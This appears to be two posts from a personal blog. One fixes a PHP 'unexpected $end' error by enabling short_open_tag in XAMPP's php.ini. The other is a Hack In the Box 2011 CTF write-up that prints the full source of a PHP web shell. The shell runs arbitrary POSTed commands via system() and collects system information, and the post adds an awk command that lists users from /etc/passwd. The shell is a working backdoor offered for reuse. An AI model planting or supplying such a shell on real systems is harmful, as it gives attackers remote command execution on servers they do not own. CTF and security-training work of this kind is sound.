PHP Parse error: syntax error, unexpected $end in on line – The Error and The Fix

While working on a test web application, last night, I hit upon the following error, which for a second had me lost.

I checked to see if I had the opening and the closing tags correct. Upon further investigation, I found that this was due to my using the “short tag” for PHP in the html_functions.php file. I normally use “” to close my PHP statements, but in this particular file, I had missed on the “php” and had accidentally used “<?" to open a statement.

As it is evident from the image, I use XAMPP to host test applications, when developing on Windows. To find more about this setting I did some reading on a specific setting in php.ini called “short_open_tag”. I opened the php.ini inside “c:\xampp\php\php.ini” – which is the default location for XAMPP, and searched for the “short_open_tag” setting. This specific setting was set to “off”, so the quickfix was to merely change the setting to “on”, restarting Apache and reloading the page. The setting in the php.ini finally looked like this:

short_open_tag = On

The following paragraph explains the setting better, taken from the php.ini file.

This directive determines whether or not PHP will recognize code between tags as PHP source which should be processed as such. It’s been recommended for several years that you not use the short tag “short cut” and instead to use the full tag combination. With the wide spread use of XML and use of these tags by other languages, the server can become easily confused and end up parsing the wrong code in the wrong context. But because this short cut has been a feature for such a long time, it’s currently still supported for backwards compatibility, but we recommend you don’t use them.

Default Value: On
Development Value: Off
Production Value: Off
http://php.net/short-open-tag


Problem solved, I spent the rest of the time I had on some fancy GUI and cookie monsters 😀

Simple PHP Web Application Backdoor

The Hack In the Box CTF PreQuals 2011 had hackers from all over the world rack their brains against a Windows Binary and a Web Application. The challenge was to submit the MD5 sum of a flag either from the binary or from the application server. Somewhere between the night of March 19th and the early morning of March 20th, a group of hackers from India managed to crack the Web Application challenge.

The web application in question was vulnerable to a Local File Inclusion vulnerability. The web server also had its FTP port open and permitted anonymous login and file upload. It was then a matter of time when people who found this started uploading web application shells which would then be called from the application’s home page. A simple Google search will give tons of shells that would allow attackers to do awesome amounts of stuff at the mere click of buttons. Prebuilt commands into the page allow attackers to search for files that are world readable, open reverse connect shells, bind ports to /bin/bash, upload and download files etc. But most of these shells are detected by antivirus software and are flagged malicious. Since I needed a simple execution interface, I decided to write a shell from scratch. Here’s the code:





simple php shell PoC - karniv0re



System Info



<?php
echo "/etc/issue:\t".exec ("cat /etc/issue")."\n";
echo "uname -a:\t".exec ("uname -a")."\n";
echo "id:\t\t".exec("id")."\n";
echo "current wd:\t".exec ("pwd")."\n";
?>

Command Output


<?php
if(isset($_POST['cmd'])){
$cmd = $_POST['cmd'];
if (strlen($cmd)==0){
$cmd = "true";
}
system($cmd);
die;
}
?>

To get a list of users once you have uploaded and gained access to your shell, you can run:

"awk -F ":" '{ print $1 "[" $3 "]" "[" $7 "]"}' /etc/passwd"

Feel free to modify and add features, but remember there are more shells out there doing much more awesome stuff than merely execute and display.

Happy Hacking!